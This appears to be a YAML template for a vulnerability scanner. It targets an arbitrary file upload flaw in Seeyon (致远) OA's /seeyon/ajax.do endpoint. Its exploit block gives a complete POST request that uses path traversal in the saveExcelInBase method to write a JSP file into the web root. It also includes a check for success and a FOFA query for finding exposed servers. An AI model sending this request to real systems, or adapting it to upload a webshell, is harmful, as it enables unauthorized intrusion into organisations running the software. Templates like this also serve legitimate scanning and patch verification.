product: 致远OA
vName: 致远OA seeyon-ajax.do 任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: ''
version: ''
note: 访问 http(s)://xx/52e039302a62d077.jsp
search:
  FOFA: app="致远互联-OA"
protocol: http
link: https://cn-sec.com/archives/2134645.html
fix:
  - 升级系统
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /seeyon/ajax.do;JSESSIONID=90113E76D97A1601201720C5AB57F7CBE
      data: 'managerMethod=saveExcelInBase&managerName=fileToExcelManager&method=ajaxAction&arguments=["../webapps/ROOT/52e039302a62d077.jsp", "", {"columnName": ["95cc64dd2825f9df13ec4ad683ecf339"]}]'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'null'
            logic: and